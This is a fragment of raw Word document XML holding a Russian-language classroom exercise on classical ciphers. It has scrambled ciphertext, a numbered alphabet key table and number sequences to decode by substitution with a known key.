        <w:t>рает_ тмт_т мтя__ ВеибВ зисет мьсья ьрьяь мья_б ___а_ _и_ее евоеи виВкр</w:t>
      </w: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яяаеа яаеас врмгр смррв _итрр _ррд_ ш</w:t>
      </w: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рчрое тмиее яяьят _инт_ _иеае рмьяд м__мт мия__ еяимм иг_юв н_ору Влввр</w:t>
      </w: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иеврн мо_оВ браВй е___ь л_еьв вр</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="239" w:lineRule="auto"/>
        <w:ind w:right="3120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>тыю_а нсыи_ _ежЕд с_уак евавп амгчр Ч,ето _б__н с,био ,но_щ тд_ ял _ечте щеомд мосдм д_рео _т_от ст,_ е ллеа_ нты_ а ло_,м доте, бол_о еоаз, папЧз атнот б_ьид у_и_: стама таьто __и_о р_у_о вдм__ з_р_р обуое ут_пь _тыяп цт_ее __е</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="600"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="242"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Расшифровать код методом подстановки при известном ключе:</w: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40"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="920"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1220"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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12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92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2200" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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24 33 44 34 36 32 11 46</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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24 63</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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1220" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="199"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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120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92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30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122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68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54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122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122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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>2</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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>5</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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>6</w:t>
            </w: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right="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w: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6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="96"/>
              </w:rPr>
              <w:t>А</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="180"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Б</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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>В</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="93"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="93"/>
              </w:rPr>
              <w:t>Г</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Д</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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>Е</w:t>
            </w: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right="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w: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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>Ё</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Ж</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4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="94"/>
              </w:rPr>
              <w:t>З</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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И</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Й</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6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="96"/>
              </w:rPr>
              <w:t>К</w:t>
            </w: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right="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w: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3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="93"/>
              </w:rPr>
              <w:t>Л</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="95"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="95"/>
              </w:rPr>
              <w:t>М</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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>Н</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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О</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П</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1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="81"/>
              </w:rPr>
              <w:t>Р</w:t>
            </w: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right="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w: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6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="96"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="180"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>Т</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5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="95"/>
              </w:rPr>
              <w:t>У</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="92"/>
              </w:rPr>
              <w:t>Ф</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Х</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9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>Ц</w:t>
            </w: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right="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>5</w:t>
            </w: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5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="95"/>
              </w:rPr>
              <w:t>Ч</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="180"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Ш</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Щ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>ъ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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76"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="76"/>
              </w:rPr>
              <w:t>ы</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75"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="75"/>
              </w:rPr>
              <w:t>ь</w:t>
            </w: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right="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>6</w:t>
            </w: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Э</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="220" w:lineRule="exact"/>
              <w:ind w:left="180"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="88"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="88"/>
              </w:rPr>
              <w:t>Ю</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2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="82"/>
              </w:rPr>
              <w:t>Я</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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5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r>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="207" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Расшифровать код методом подстановки при известном ключе:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="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40"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="340"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="80"/>
        <w:gridCol w:w="280"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="120"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="120"/>
        <w:gridCol w:w="80"/>
        <w:gridCol w:w="220"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="80"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="280"/>
        <w:gridCol w:w="80"/>
        <w:gridCol w:w="180"/>
        <w:gridCol w:w="180"/>
        <w:gridCol w:w="80"/>
        <w:gridCol w:w="220"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="160"/>
      </w:tblGrid>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7</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="120"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
